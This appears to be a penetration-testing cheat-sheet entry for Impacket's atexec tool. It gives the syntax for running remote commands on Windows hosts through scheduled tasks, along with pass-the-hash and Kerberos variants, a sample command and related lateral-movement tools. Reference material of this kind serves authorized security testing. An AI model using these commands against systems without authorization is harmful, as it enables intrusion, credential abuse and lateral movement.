Impacket atexec.py (Scheduled Task)
One-shot command execution by creating, running, and deleting a scheduled task over MS-TSCH. Output is captured from \\127.0.0.1\ADMIN$. Requires local admin.
- Tool
- impacket-atexec
- Category
- Lateral Movement / Remote Shells
- Platform
- linux
- Requires
- password
- Protocols
- SMB, RPC
Syntax
Angle-bracket tokens are placeholders — replace them with your target's values, or open this command in the app to fill them in and copy the result.
impacket-atexec '<domain>/<user>:<password>@<target>' '<command>'
Credential variants
The same attack using a different authentication material.
Pass-the-Hash requires NTLM hash
impacket-atexec -hashes :<nt-hash> '<domain>/<user>@<target>' '<command>'
Kerberos requires Kerberos ticket
impacket-atexec -k -no-pass '<domain>/<user>@<target>' '<command>'
Examples
impacket-atexec corp.local/jdoe:'Password123!'@10.10.10.10 'whoami /all'
Tags
References
Related commands
- Evil-WinRM Shell Windows Remote Management shell connection
- Impacket AtExec Execute commands via Windows Task Scheduler service
- Impacket DCOMExec Execute commands via DCOM (Distributed Component Object Model)
- Impacket dcomexec.py Execute commands over DCOM (MMC20.Application / ShellWindows / ShellBrowserWindow)…
- Impacket PSExec Execute commands via PSExec service
- Impacket SMBExec Execute commands via SMB service creation
- Impacket WMIExec Execute commands via WMI (Windows Management Instrumentation)
- NetExec SMB Command Exec Execute commands on a remote Windows host via SMB using NetExec